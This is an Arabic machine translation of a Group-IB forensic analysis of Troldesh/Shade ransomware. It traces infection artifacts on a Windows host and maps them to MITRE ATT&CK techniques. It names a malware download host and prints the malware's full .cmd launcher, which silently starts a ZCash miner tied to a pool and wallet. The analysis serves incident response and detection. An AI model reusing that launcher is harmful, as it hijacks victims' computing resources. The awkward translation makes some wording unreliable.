هذا كل ما تبقى بعدك: التحف الجنائية من رانسومواري Troldesh (الظل)

صورة

إذا تابعت الأخبار ، فمن المحتمل أن تكون على علم بشن هجوم جديد واسع النطاق على الشركات الروسية لفيروس Troldesh ransomware (Shade) ، وهو أحد أكثر برامج تشفير التشفير شيوعًا بين مجرمي الإنترنت. في يونيو وحده ، اكتشفت Group-IB أكثر من 1100 رسالة بريد إلكتروني تصيّد من Troldesh تم إرسالها بالنيابة عن موظفي شركات الطيران الكبرى وتجار السيارات ووسائل الإعلام.

في هذه المقالة ، سوف نلقي نظرة على القطع الأثرية التي يمكن العثور عليها بعد هجوم Shade / Troldesh على وسائط جهاز مخترق ، وكذلك مقارنة التكتيكات والتقنيات المستخدمة من قبل المهاجمين مع MITER ATT & CK.

بقلم أوليغ سكولكين ، اختصاصي الأدلة الجنائية في Group-IB

Troldesh ، المعروف أيضًا باسم Shade و XTBL و Trojan.Encoder.858 و Da Vinci و No_more_ransome ، هو فيروس يقوم بتشفير الملفات على جهاز مستخدم مصاب ويتطلب فدية لاستعادة الوصول إلى المعلومات. لقد أظهرت الحملات الأخيرة مع Troldesh أنه الآن لا يقوم فقط بتشفير الملفات ، ولكن أيضًا منجم عمال المناجم المشفرة ويولد حركة مرور إلى مواقع الويب لزيادة حركة المرور والإيرادات من الإعلانات عبر الإنترنت.

في المرة الأولى التي اكتشف فيها خبراء Group-IB نشاط Troldesh في عام 2015 ، لاحظوا أن الفيروس قد اجتاز بنجاح أدوات الحماية من الفيروسات. قام المهاجمون بتغيير "packer" بانتظام - وهو برنامج packer يقلل من حجم الملف ويجعل من الصعب اكتشافه وعكسه - وبسبب هذا ، غالبًا ما تخطته برامج مكافحة الفيروسات. بحلول نهاية عام 2018 ، أصبحت Troldesh واحدة من أكثر الفيروسات شعبية ودخلت بثقة أعلى 3 ، جنبا إلى جنب مع RTM و Pony. أفاد خبراء PaloAlto Networks بأن Troldesh لا يعمل فقط للأغراض الروسية - من بين البلدان المتأثرة بفدية الفدية هي الولايات المتحدة واليابان والهند وتايلاند وكندا.

ناقل العدوى الأولي


عادةً ما يتم توزيع "Troldesh / Shade" عبر رسائل البريد الإلكتروني المخادعة مع مرفقات ضارة ، على سبيل المثال ، المحفوظات المحمية بكلمة مرور التي تحتوي على ملفات JS ضارة ، بعد الفتح يتم تنزيل cryptolocker وإطلاقه. ماذا يعني هذا؟ سيكون من الجيد أن نبدأ دراستنا عن طريق تحليل آثار فتح هذه المحفوظات. أين يمكن العثور على هذه الآثار؟ حسنًا ، على سبيل المثال ، في قوائم الانتقال السريع:

بديل الصورة

البيانات المستخرجة من ملف 5f7b5f1e01b83767.automaticDestinations-ms باستخدام JLECmd

لذلك ، نرى أن المستخدم قد فتح الأرشيف باسم "password 11.rar حول الطلب". ولكن كيف دخل النظام؟ يوجد الملف في دليل التنزيلات ، على الأرجح تم تنزيله من الإنترنت. دعنا نلقي نظرة على سجل المتصفح:

بديل الصورة

البيانات المستخرجة من ملف WebCache01.dat باستخدام مركز أدلة Belkasoft

كما ترى ، تم تنزيل الملف باستخدام مستعرض الويب الخاص بـ Microsoft Edge وحفظه في دليل التنزيلات. علاوة على ذلك ، وقبل التنزيل مباشرة ، قام المستخدم بزيارة موقع البريد الإلكتروني ، وبالتالي ، تم استلام الأرشيف عبر البريد الإلكتروني.
وبالتالي ، فإننا نتعامل مع الأسلوب الأكثر شيوعًا: T1193 - "Spearphishing Attachment".

بدء وتجاوز آليات الحماية


إذا نظرنا داخل الأرشيف ، فسنجد ملف JS يحمل اسمًا متطابقًا تقريبًا. لكي يتم تحميل البرامج الضارة وبدء العمل ، يجب على المستخدم النقر نقرًا مزدوجًا على الملف المحدد. بعد ذلك ، يقوم "wscript.exe" بإطلاق ملف JS ، والذي سيقوم بتنزيل الملف الضار من mat.tradetoolsfx [.] Com وتشغيله. يمكن أن نجد أي آثار لهذا على القرص؟ بالطبع!

دعونا نلقي نظرة على ملف الجلب المسبق wscript.exe ، مع التركيز على الملفات التي تفاعل معها:
<...>
\ المجلد {01d3dcb4976cd072-3a97874f} \ USERS \ 0136 \ APPDATA \ LOCAL \ MICROSOFT \ WINDOWS \ INETCACHE \ IE \ OEJ87644 \ 1C [1] .JPG
\ VOLUME {01d3dcb4976cd072-3a97874f} \ USERS \ 0136 \ APPDATA \ LOCAL \ TEMP \ 7ZO84024637 \ تفاصيل الطلب A.JS
<...>
لذلك ، لدينا ملفين للاهتمام. أولاً ، نحن نعرف الآن اسم ملف JS الذي كان في الأرشيف ، وثانياً ، اكتشفنا اسم الملف الذي تم تنزيله. حان الوقت لمعرفة مكان تنزيله منه. دعنا نلقي نظرة على WebCache01.dat مرة أخرى:

بديل الصورة

تم استرداد البيانات من WebCache01.dat باستخدام ESEDatabaseView

إذا قمنا بفك تشفير محتويات حقل ResponseHeaders ، فسنحصل على ما يلي:
HTTP / 1.1 200 موافق
نوع المحتوى: image / jpeg
طول المحتوى: 1300656
ETag: "5ced19b6-13d8b0"
أمان صارم - النقل: الحد الأقصى للعمر = 31536000 ؛
في الواقع ، هذا ليس ملف JPG ، ولكنه ملف قابل للتنفيذ يقوم بفك تشفير وتشغيل مثيل Shade.
فما التقنيات التي نتعامل معها هنا؟ البرمجة النصية (T1064) ، تنفيذ المستخدم (T1204) ، و Masquerading (T1036).

دبوس النظام


يستخدم "Shade" طريقة تافهة إلى حد ما لإصلاح النظام - مفتاح التسجيل "Software \ Microsoft \ Windows \ CurrentVersion \ Run" (T1060). نحن نعلم بالفعل أن ملف JS الضار تم فتحه بواسطة المستخدم "0136" ، لذلك ألق نظرة على الملف المقابل "NTUSER.DAT":

بديل الصورة

آلية القفل في النظام التي اكتشفها مركز أدلة Belkasoft

لكن هذا ليس كل شيء! مزيد من أكثر إثارة للاهتمام:
بديل الصورة

آلية القفل في النظام التي اكتشفها مركز أدلة Belkasoft

كما ترون في الرسم التوضيحي ، هناك إدخال آخر مثير للاهتمام يشير إلى C: \ ProgramData \ SysWOW64 \ leWRX7w.cmd. دعونا نرى ما هو داخل هذا الملف:
echo CreateObject ("Wscript.Shell"). تشغيل "" ^ & WScript.Arguments (0) ^ & ""، 0، False> "٪ TEMP٪ / pxNXSB.vbs" && start / WAIT wscript.exe "٪ TEMP٪ /pxNXSB.vbs "" C: \ Users \ 0136 \ AppData \ Roaming \ SOFTWA ~ 1 \ NHEQMI ~ 1.EXE -l eu1-zcash.flypool.org ∗ 333 -u t1L9iBXyRgaYrQ5JSTSdstopV6pHtZ2Xdep.7B9D281٪ TEMP٪ \ pxNXSB.vbs "
لذلك ، لدينا ملف واحد آخر. اذا حكمنا من خلال محتوياته ، يتم استخدامه من قبل المهاجمين لاستخراج عملة التشفير ZCash. وبالتالي ، حتى إذا دفعت الضحية الفدية ، فإن موارد نظامها ستظل تستخدم من قبل المتسللين.

العواقب


بادئ ذي بدء ، "Shade" عبارة عن cryptoclocker ، لذا فإن أول ما يلفت انتباهك هو وجود الكثير من الملفات ذات الامتداد "CRYPTED000007" ، و "Read Me" ، وكذلك خلفيات "حديثة" على سطح مكتبك:

بديل الصورة

يمكن العثور على ملف بهذه الصورة في الدليل C: \ Users \٪ username٪ \ AppData \ Roaming. ما المعدات التي نتعامل معها؟ "البيانات المشفرة للتأثير" (T1486).
ولكن ، كما فهمت بالفعل ، "الظل" ليس خزانة تشفير عادية. بالإضافة إلى cryptoclocker نفسها ، وجدنا أيضًا عامل منجم ، مما يعني أنه يجدر ذكر تقنية أخرى - "Resource Hijacking".

MITER ATT & CK


كشف تحليلنا عن عدد من الأساليب والتقنيات لموزعي الظل ، دعونا نلخص:

الهويةاسموصف
T1193صيد الأسماك بالرمح المرفقيتم توزيع الظل عبر رسائل البريد الإلكتروني للتصيد مع مرفقات ضارة
T1204تنفيذ المستخدميجب على المستخدم تشغيل ملف JS من الأرشيف المرفق بالبريد الإلكتروني.
T1064البرمجةيستخدم المهاجمون ملفات JS لتنزيل البرامج الضارة
T1036التنكرتحتوي ملفات البرامج الضارة التي تم تنزيلها على ملحق "JPG" بدلاً من "EXE"
T1060تشغيل السجل مفاتيح / مجلد بدء التشغيليستخدم "Shade" مفتاح التسجيل "Software \ Microsoft \ Windows \ CurrentVersion \ Run" للإرساء في النظام
T1486تشفير البيانات للتأثيرالظل بتشفير الملفات للحصول على فدية
T1496اختطاف الموارديستخدم الظل موارد الكمبيوتر الضحية لاستخراج cryptocurrency

Source: https://habr.com/ru/post/ar457592/


All Articles